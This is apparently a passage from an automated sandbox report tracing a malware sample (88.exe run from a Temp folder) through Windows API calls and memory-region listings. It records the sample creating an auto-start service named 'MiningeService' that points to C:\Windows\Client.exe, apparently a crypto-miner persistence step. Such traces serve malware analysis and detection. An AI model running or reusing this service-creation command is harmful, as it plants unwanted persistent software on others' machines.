1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 5967 start_va = 0x1c20000 end_va = 0x1eeefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 231 os_tid = 0xa24 [0273.819] GetProcAddress (hModule=0x769b0000, lpProcName="SetConsoleInputExeNameW") returned 0x769da775 [0273.819] GetProcessHeap () returned 0x720000 [0273.819] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x400a) returned 0x7359b0 [0273.819] GetProcessHeap () returned 0x720000 [0273.820] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x7359b0 | out: hHeap=0x720000) returned 1 [0273.820] _wcsicmp (_String1="Sc", _String2=")") returned 74 [0273.820] _wcsicmp (_String1="FOR", _String2="Sc") returned -13 [0273.820] _wcsicmp (_String1="FOR/?", _String2="Sc") returned -13 [0273.820] _wcsicmp (_String1="IF", _String2="Sc") returned -10 [0273.820] _wcsicmp (_String1="IF/?", _String2="Sc") returned -10 [0273.820] _wcsicmp (_String1="REM", _String2="Sc") returned -1 [0273.820] _wcsicmp (_String1="REM/?", _String2="Sc") returned -1 [0273.820] GetProcessHeap () returned 0x720000 [0273.820] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x58) returned 0x733220 [0273.820] GetProcessHeap () returned 0x720000 [0273.820] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0xe) returned 0x730110 [0273.822] GetProcessHeap () returned 0x720000 [0273.822] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0xc4) returned 0x733280 [0273.823] GetConsoleTitleW (in: lpConsoleTitle=0x2df4c0, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\88.exe") returned 0x2b [0273.823] _wcsicmp (_String1="Sc", _String2="DIR") returned 15 [0273.823] _wcsicmp (_String1="Sc", _String2="ERASE") returned 14 [0273.823] _wcsicmp (_String1="Sc", _String2="DEL") returned 15 [0273.823] _wcsicmp (_String1="Sc", _String2="TYPE") returned -1 [0273.823] _wcsicmp (_String1="Sc", _String2="COPY") returned 16 [0273.823] _wcsicmp (_String1="Sc", _String2="CD") returned 16 [0273.823] _wcsicmp (_String1="Sc", _String2="CHDIR") returned 16 [0273.824] _wcsicmp (_String1="Sc", _String2="RENAME") returned 1 [0273.824] _wcsicmp (_String1="Sc", _String2="REN") returned 1 [0273.824] _wcsicmp (_String1="Sc", _String2="ECHO") returned 14 [0273.824] _wcsicmp (_String1="Sc", _String2="SET") returned -2 [0273.824] _wcsicmp (_String1="Sc", _String2="PAUSE") returned 3 [0273.824] _wcsicmp (_String1="Sc", _String2="DATE") returned 15 [0273.824] _wcsicmp (_String1="Sc", _String2="TIME") returned -1 [0273.824] _wcsicmp (_String1="Sc", _String2="PROMPT") returned 3 [0273.824] _wcsicmp (_String1="Sc", _String2="MD") returned 6 [0273.824] _wcsicmp (_String1="Sc", _String2="MKDIR") returned 6 [0273.824] _wcsicmp (_String1="Sc", _String2="RD") returned 1 [0273.824] _wcsicmp (_String1="Sc", _String2="RMDIR") returned 1 [0273.824] _wcsicmp (_String1="Sc", _String2="PATH") returned 3 [0273.824] _wcsicmp (_String1="Sc", _String2="GOTO") returned 12 [0273.824] _wcsicmp (_String1="Sc", _String2="SHIFT") returned -5 [0273.824] _wcsicmp (_String1="Sc", _String2="CLS") returned 16 [0273.824] _wcsicmp (_String1="Sc", _String2="CALL") returned 16 [0273.824] _wcsicmp (_String1="Sc", _String2="VERIFY") returned -3 [0273.824] _wcsicmp (_String1="Sc", _String2="VER") returned -3 [0273.824] _wcsicmp (_String1="Sc", _String2="VOL") returned -3 [0273.824] _wcsicmp (_String1="Sc", _String2="EXIT") returned 14 [0273.824] _wcsicmp (_String1="Sc", _String2="SETLOCAL") returned -2 [0273.824] _wcsicmp (_String1="Sc", _String2="ENDLOCAL") returned 14 [0273.824] _wcsicmp (_String1="Sc", _String2="TITLE") returned -1 [0273.824] _wcsicmp (_String1="Sc", _String2="START") returned -17 [0273.824] _wcsicmp (_String1="Sc", _String2="DPATH") returned 15 [0273.824] _wcsicmp (_String1="Sc", _String2="KEYS") returned 8 [0273.824] _wcsicmp (_String1="Sc", _String2="MOVE") returned 6 [0273.824] _wcsicmp (_String1="Sc", _String2="PUSHD") returned 3 [0273.824] _wcsicmp (_String1="Sc", _String2="POPD") returned 3 [0273.824] _wcsicmp (_String1="Sc", _String2="ASSOC") returned 18 [0273.824] _wcsicmp (_String1="Sc", _String2="FTYPE") returned 13 [0273.825] _wcsicmp (_String1="Sc", _String2="BREAK") returned 17 [0273.825] _wcsicmp (_String1="Sc", _String2="COLOR") returned 16 [0273.825] _wcsicmp (_String1="Sc", _String2="MKLINK") returned 6 [0273.825] _wcsicmp (_String1="Sc", _String2="DIR") returned 15 [0273.825] _wcsicmp (_String1="Sc", _String2="ERASE") returned 14 [0273.825] _wcsicmp (_String1="Sc", _String2="DEL") returned 15 [0273.825] _wcsicmp (_String1="Sc", _String2="TYPE") returned -1 [0273.825] _wcsicmp (_String1="Sc", _String2="COPY") returned 16 [0273.825] _wcsicmp (_String1="Sc", _String2="CD") returned 16 [0273.825] _wcsicmp (_String1="Sc", _String2="CHDIR") returned 16 [0273.825] _wcsicmp (_String1="Sc", _String2="RENAME") returned 1 [0273.825] _wcsicmp (_String1="Sc", _String2="REN") returned 1 [0273.825] _wcsicmp (_String1="Sc", _String2="ECHO") returned 14 [0273.825] _wcsicmp (_String1="Sc", _String2="SET") returned -2 [0273.825] _wcsicmp (_String1="Sc", _String2="PAUSE") returned 3 [0273.825] _wcsicmp (_String1="Sc", _String2="DATE") returned 15 [0273.825] _wcsicmp (_String1="Sc", _String2="TIME") returned -1 [0273.825] _wcsicmp (_String1="Sc", _String2="PROMPT") returned 3 [0273.825] _wcsicmp (_String1="Sc", _String2="MD") returned 6 [0273.825] _wcsicmp (_String1="Sc", _String2="MKDIR") returned 6 [0273.825] _wcsicmp (_String1="Sc", _String2="RD") returned 1 [0273.825] _wcsicmp (_String1="Sc", _String2="RMDIR") returned 1 [0273.825] _wcsicmp (_String1="Sc", _String2="PATH") returned 3 [0273.825] _wcsicmp (_String1="Sc", _String2="GOTO") returned 12 [0273.825] _wcsicmp (_String1="Sc", _String2="SHIFT") returned -5 [0273.825] _wcsicmp (_String1="Sc", _String2="CLS") returned 16 [0273.825] _wcsicmp (_String1="Sc", _String2="CALL") returned 16 [0273.825] _wcsicmp (_String1="Sc", _String2="VERIFY") returned -3 [0273.825] _wcsicmp (_String1="Sc", _String2="VER") returned -3 [0273.825] _wcsicmp (_String1="Sc", _String2="VOL") returned -3 [0273.825] _wcsicmp (_String1="Sc", _String2="EXIT") returned 14 [0273.825] _wcsicmp (_String1="Sc", _String2="SETLOCAL") returned -2 [0273.825] _wcsicmp (_String1="Sc", _String2="ENDLOCAL") returned 14 [0273.826] _wcsicmp (_String1="Sc", _String2="TITLE") returned -1 [0273.826] _wcsicmp (_String1="Sc", _String2="START") returned -17 [0273.826] _wcsicmp (_String1="Sc", _String2="DPATH") returned 15 [0273.826] _wcsicmp (_String1="Sc", _String2="KEYS") returned 8 [0273.826] _wcsicmp (_String1="Sc", _String2="MOVE") returned 6 [0273.826] _wcsicmp (_String1="Sc", _String2="PUSHD") returned 3 [0273.826] _wcsicmp (_String1="Sc", _String2="POPD") returned 3 [0273.826] _wcsicmp (_String1="Sc", _String2="ASSOC") returned 18 [0273.826] _wcsicmp (_String1="Sc", _String2="FTYPE") returned 13 [0273.826] _wcsicmp (_String1="Sc", _String2="BREAK") returned 17 [0273.826] _wcsicmp (_String1="Sc", _String2="COLOR") returned 16 [0273.826] _wcsicmp (_String1="Sc", _String2="MKLINK") returned 6 [0273.826] _wcsicmp (_String1="Sc", _String2="FOR") returned 13 [0273.826] _wcsicmp (_String1="Sc", _String2="IF") returned 10 [0273.826] _wcsicmp (_String1="Sc", _String2="REM") returned 1 [0273.826] GetProcessHeap () returned 0x720000 [0273.826] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x210) returned 0x733350 [0273.826] GetProcessHeap () returned 0x720000 [0273.826] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0xca) returned 0x733568 [0273.826] _wcsnicmp (_String1="Sc", _String2="cmd ", _MaxCount=0x4) returned 16 [0273.826] GetProcessHeap () returned 0x720000 [0273.826] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x418) returned 0x7207f0 [0273.827] SetErrorMode (uMode=0x0) returned 0x8001 [0273.827] SetErrorMode (uMode=0x1) returned 0x0 [0273.827] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x7207f8, lpFilePart=0x2defe0 | out: lpBuffer="C:\\Windows", lpFilePart=0x2defe0*="Windows") returned 0xa [0273.827] SetErrorMode (uMode=0x8001) returned 0x1 [0273.827] GetProcessHeap () returned 0x720000 [0273.827] RtlReAllocateHeap (Heap=0x720000, Flags=0x0, Ptr=0x7207f0, Size=0x24) returned 0x7207f0 [0273.827] GetProcessHeap () returned 0x720000 [0273.827] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x7207f0) returned 0x24 [0273.827] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4aad0640, nSize=0x2000 | out: lpBuffer="") returned 0x8f [0273.827] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0273.827] GetProcessHeap () returned 0x720000 [0273.827] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x142) returned 0x733640 [0273.827] GetProcessHeap () returned 0x720000 [0273.827] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x27c) returned 0x720820 [0273.836] GetProcessHeap () returned 0x720000 [0273.836] RtlReAllocateHeap (Heap=0x720000, Flags=0x0, Ptr=0x720820, Size=0x144) returned 0x720820 [0273.836] GetProcessHeap () returned 0x720000 [0273.836] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x720820) returned 0x144 [0273.836] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4aad0640, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0273.836] GetProcessHeap () returned 0x720000 [0273.836] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0xe0) returned 0x720970 [0273.836] GetProcessHeap () returned 0x720000 [0273.836] RtlReAllocateHeap (Heap=0x720000, Flags=0x0, Ptr=0x720970, Size=0x76) returned 0x720970 [0273.836] GetProcessHeap () returned 0x720000 [0273.836] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x720970) returned 0x76 [0273.837] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0273.837] FindFirstFileExW (in: lpFileName="C:\\Windows\\Sc.*", fInfoLevelId=0x1, lpFindFileData=0x2ded5c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ded5c) returned 0xffffffff [0273.838] GetLastError () returned 0x2 [0273.838] FindFirstFileExW (in: lpFileName="C:\\Windows\\Sc", fInfoLevelId=0x1, lpFindFileData=0x2ded5c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ded5c) returned 0xffffffff [0273.838] GetLastError () returned 0x2 [0273.838] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0273.839] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\Sc.*", fInfoLevelId=0x1, lpFindFileData=0x2ded5c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ded5c) returned 0x733790 [0273.839] GetProcessHeap () returned 0x720000 [0273.839] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x0, Size=0x14) returned 0x7337d0 [0273.839] FindClose (in: hFindFile=0x733790 | out: hFindFile=0x733790) returned 1 [0273.839] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.COM", fInfoLevelId=0x1, lpFindFileData=0x2ded5c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ded5c) returned 0xffffffff [0273.839] GetLastError () returned 0x2 [0273.840] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.EXE", fInfoLevelId=0x1, lpFindFileData=0x2ded5c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ded5c) returned 0x733790 [0273.840] GetProcessHeap () returned 0x720000 [0273.840] RtlReAllocateHeap (Heap=0x720000, Flags=0x0, Ptr=0x7337d0, Size=0x4) returned 0x7337d0 [0273.840] FindClose (in: hFindFile=0x733790 | out: hFindFile=0x733790) returned 1 [0273.840] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0273.840] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0273.840] GetConsoleTitleW (in: lpConsoleTitle=0x2df254, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\88.exe") returned 0x2b [0273.882] InitializeProcThreadAttributeList (in: lpAttributeList=0x2df0dc, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2df1a4 | out: lpAttributeList=0x2df0dc, lpSize=0x2df1a4) returned 1 [0273.882] UpdateProcThreadAttribute (in: lpAttributeList=0x2df0dc, dwFlags=0x0, Attribute=0x60001, lpValue=0x2df19c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2df0dc, lpPreviousValue=0x0) returned 1 [0273.882] GetStartupInfoW (in: lpStartupInfo=0x2df098 | out: lpStartupInfo=0x2df098*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\88.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x214, hStdOutput=0x20c, hStdError=0x20c)) [0273.883] GetProcessHeap () returned 0x720000 [0273.883] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x18) returned 0x731908 [0273.883] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0273.883] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0273.883] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0273.883] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0273.883] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0273.883] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0273.883] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0273.883] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0273.883] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0273.883] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0273.883] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0273.883] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0273.883] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0273.883] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0273.883] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0273.883] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0273.883] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0273.883] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0273.884] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0273.884] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0273.884] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0273.884] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0273.884] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0273.884] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0273.884] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0273.884] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0273.884] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0273.884] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0273.884] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0273.884] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0273.884] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0273.884] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0273.884] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0273.884] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0273.884] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0273.884] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0273.884] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0273.884] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0273.884] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0273.884] GetProcessHeap () returned 0x720000 [0273.884] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x731908 | out: hHeap=0x720000) returned 1 [0273.884] GetProcessHeap () returned 0x720000 [0273.884] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0xa) returned 0x730128 [0273.884] lstrcmpW (lpString1="\\sc.exe", lpString2="\\XCOPY.EXE") returned -1 [0273.887] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\sc.exe", lpCommandLine="Sc create MiningeService binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows", lpStartupInfo=0x2df138*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="Sc create MiningeService binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2df184 | out: lpCommandLine="Sc create MiningeService binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService", lpProcessInformation=0x2df184*(hProcess=0x84, hThread=0x80, dwProcessId=0xa38, dwThreadId=0xa3c)) returned 1 [0273.892] CloseHandle (hObject=0x80) returned 1 [0273.892] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0273.892] GetProcessHeap () returned 0x720000 [0273.892] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x734e60 | out: hHeap=0x720000) returned 1 [0273.892] GetEnvironmentStringsW () returned 0x734310* [0273.892] GetProcessHeap () returned 0x720000 [0273.892] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0xb44) returned 0x734e60 [0273.892] FreeEnvironmentStringsW (penv=0x734310) returned 1 [0273.892] WaitForSingleObject (hHandle=0x84, dwMilliseconds=0xffffffff) returned 0x0 [0274.292] GetExitCodeProcess (in: hProcess=0x84, lpExitCode=0x2df078 | out: lpExitCode=0x2df078*=0x0) returned 1 [0274.292] CloseHandle (hObject=0x84) returned 1 [0274.292] _vsnwprintf (in: _Buffer=0x2df1c0, _BufferCount=0x13, _Format="%08X", _ArgList=0x2df084 | out: _Buffer="00000000") returned 8 [0274.292] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0274.292] GetProcessHeap () returned 0x720000 [0274.293] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x734e60 | out: hHeap=0x720000) returned 1 [0274.293] GetEnvironmentStringsW () returned 0x734310* [0274.293] GetProcessHeap () returned 0x720000 [0274.293] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0xb6a) returned 0x738528 [0274.293] FreeEnvironmentStringsW (penv=0x734310) returned 1 [0274.293] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0274.293] GetProcessHeap () returned 0x720000 [0274.293] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x738528 | out: hHeap=0x720000) returned 1 [0274.293] GetEnvironmentStringsW () returned 0x734310* [0274.293] GetProcessHeap () returned 0x720000 [0274.293] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0xb6a) returned 0x738528 [0274.293] FreeEnvironmentStringsW (penv=0x734310) returned 1 [0274.293] GetProcessHeap () returned 0x720000 [0274.293] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x730128 | out: hHeap=0x720000) returned 1 [0274.294] DeleteProcThreadAttributeList (in: lpAttributeList=0x2df0dc | out: lpAttributeList=0x2df0dc) [0274.294] _get_osfhandle (_FileHandle=1) returned 0x20c [0274.294] SetConsoleMode (hConsoleHandle=0x20c, dwMode=0x0) returned 0 [0274.294] _get_osfhandle (_FileHandle=1) returned 0x20c [0274.294] GetConsoleMode (in: hConsoleHandle=0x20c, lpMode=0x4aac41ac | out: lpMode=0x4aac41ac) returned 0 [0274.294] _get_osfhandle (_FileHandle=0) returned 0x214 [0274.294] GetConsoleMode (in: hConsoleHandle=0x214, lpMode=0x4aac41b0 | out: lpMode=0x4aac41b0) returned 0 [0274.294] GetConsoleOutputCP () returned 0x1b5 [0274.294] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4aac4260 | out: lpCPInfo=0x4aac4260) returned 1 [0274.294] SetThreadUILanguage (LangId=0x0) returned 0x409 [0274.294] exit (_Code=0) Process: id = "28" image_name = "sc.exe" filename = "c:\\windows\\syswow64\\sc.exe" page_root = "0x775cb000" os_pid = "0xa38" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "27" os_parent_pid = "0xa20" cmd_line = "Sc create MiningeService binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService" cur_dir = "C:\\Windows\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e771" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5968 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5969 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 5970 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 5971 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 5972 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 5973 start_va = 0x70000 end_va = 0xaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 5974 start_va = 0x250000 end_va = 0x28ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 5975 start_va = 0x600000 end_va = 0x60bfff monitored = 1 entry_point = 0x607997 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\SysWOW64\\sc.exe" (normalized: "c:\\windows\\syswow64\\sc.exe") Region: id = 5976 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5977 start_va = 0x779e0000 end_va = 0x77b5ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5978 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 5979 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 5980 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 5981 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 5982 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 5983 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5984 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5985 start_va = 0x180000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 5986 start_va = 0x75250000 end_va = 0x75257fff monitored = 0 entry_point = 0x752520f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5987 start_va = 0x75260000 end_va = 0x752bbfff monitored = 0 entry_point = 0x7529f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5988 start_va = 0x752c0000 end_va = 0x752fefff monitored = 0 entry_point = 0x752ee088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5989 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5990 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5991 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5992 start_va = 0x776e0000 end_va = 0x777fefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000776e0000" filename = "" Region: id = 5993 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 5994 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 5995 start_va = 0x290000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 5996 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5997 start_va = 0x76fe0000 end_va = 0x77026fff monitored = 0 entry_point = 